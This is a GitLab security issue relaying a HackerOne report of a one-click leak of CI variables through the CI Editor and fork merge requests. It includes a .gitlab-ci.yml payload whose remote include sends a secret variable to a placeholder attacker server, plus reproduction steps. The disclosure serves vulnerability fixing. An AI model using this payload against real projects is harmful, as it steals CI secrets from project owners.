Backend: Leaking CI variables by visiting the CI Editor via fork MRs

⚠ Please read the process on how to fix security issues before starting to work on the issue. Vulnerabilities must be fixed in a security mirror.

HackerOne report #1890451 by shells3c on 2023-03-02, assigned to GitLab Team:

By clicking on a link, project members can leak CI variables of their project to hackers

[Victim account] Create a project, create a CI variable in General > CI/CD > Variables named xxx_variable
[Attacker account] Fork the project, and edit the CI configuration (.gitlab-ci.yml by default) with the following content (replace <ATTACKER SERVER> with your server):

include:  
  remote: 'http://<ATTACKER SERVER>/${xxx_variable}.yaml'

[Attacker account] Create a merge request with the previous change, save the commit SHA
[Victim account] Visit this link (with <sha> replaced) and the variable will be sent to the attacker server: https://gitlab.com/<user>/<project>/-/ci/editor?branch_name=<sha>

This bug happens on GitLab.com

Steal CI variables by one click

Please add reproducibility information to this section:

Edited Jul 07, 2023 by Mark Nuzzo